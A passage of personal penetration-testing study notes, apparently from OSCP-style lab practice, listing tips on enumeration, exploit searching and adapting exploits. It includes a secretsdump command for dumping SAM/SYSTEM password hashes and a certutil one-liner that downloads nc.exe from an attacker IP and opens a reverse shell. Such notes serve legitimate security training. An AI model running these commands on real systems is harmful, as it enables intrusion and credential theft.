justeslam/offsec2/notes/outtakes.md

 - Dumping secrets is mainstream knowledge, stop slackin' (C:\windows.old\windows\system32\SAM & SYSTEM>) -> "/usr/local/bin/secretsdump.py -sam SAM -system SYSTEM LOCAL".
 - If you can see that your shell is not maintaining, try modifying the exploit code to suit your needs.
 In this case, I downloaded and ran nc.exe. "certutil.exe -urlcache -split -f http://192.168.45.195:443/nc.exe C:\Windows\Tasks\nc.exe & C:\Windows\Tasks\nc.exe -e cmd.exe 192.168.45.195 80" instead of typing the command as a parameter to the exploit.
 - For any weird port, search up related exploit along with any fingerprint that you have to narrow down results.
-- If there's a weird port, such as cgms 3003, try to connect to it and get the version "nc -zv $IP -> help -> version -> search exploit".
+- If there's a weird port, such as cgms 3003, try to connect to it and get the version "nc -zv $ip -> help -> version -> search exploit".
 If this makes no sense you can also refer to "https://github.com/xsudoxx/OSCP".
 - Always search for exploits using terms as vague as possible, then narrow down afterwards, this way you don't miss something.
 - If you have problems compiling an exploit on a target, try doing it on your local computer.
 - If you're POSTing data for a website, try to modify the route.
 In this case, an exploit relied on htmLawed.php for the exploit to work, and when it tried to post there, it noticed that there was no file with this name.
 When I modified the route to '/', it worked.